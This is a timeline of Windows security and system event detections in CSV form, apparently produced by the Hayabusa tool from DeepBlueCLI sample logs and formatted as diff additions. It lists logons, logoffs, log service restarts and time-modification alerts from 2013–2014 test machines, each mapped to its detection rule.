+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
